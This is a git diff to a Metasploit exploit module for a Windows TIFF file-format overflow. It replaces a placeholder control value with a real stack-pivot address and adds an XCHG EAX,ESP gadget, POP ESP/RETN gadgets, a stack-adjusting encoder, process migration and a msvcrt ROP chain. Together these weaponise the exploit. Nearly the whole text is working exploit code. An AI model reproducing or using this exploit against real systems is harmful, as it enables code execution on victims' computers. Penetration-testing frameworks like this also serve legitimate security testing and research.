diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index fe317c739f..9767a3b198 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -69,11 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'BadChars' => "\x00" + 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff", # add esp, -80000; popad; popfd + 'StackAdjustment' => -3500, + 'BadChars' => "\x00" }, 'DefaultOptions' => { - 'ExitFunction' => "process" + 'ExitFunction' => "process", + 'PrependMigrate' => true }, 'Platform' => 'win', 'Targets' => @@ -134,7 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote end # Gain control of the call [eax+50h] instruction - buf[0x4874, 4] = [0x41424344-0x50].pack('V') + # XCHG EAX, ESP; RETN msvcrt + buf[0x4874, 4] = [0x200F0700-0x50].pack('V') buf end @@ -147,8 +151,10 @@ class Metasploit3 < Msf::Exploit::Remote # Target address (200F0700): # 0:000> dd 200f06fc L4 # 200f06fc ffffffff 36643ab8 d9c0d946 5af42474 - p = generate_rop_payload('msvcrt','',{'target'=>'xp'}) - p << payload.encoded + p = '' + p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt + p << generate_rop_payload('msvcrt','',{'target'=>'xp'}) + p << payload.encoded block = p block << "B" * (1024 - p.length) @@ -227,7 +233,10 @@ class Metasploit3 < Msf::Exploit::Remote mscd << [0x00000002].pack('V') mscd << [0x00000003].pack('V') mscd << [0xfffffffe].pack('V') - mscd << [0xffffffff].pack('V') * 52 + mscd << [0xffffffff].pack('V') * 32 #52 + mscd << [0x77c34fbf].pack('V') # POP ESP # RETN + mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP + mscd << [0xffffffff].pack('V') * 18 mscd << @rop_payload mscd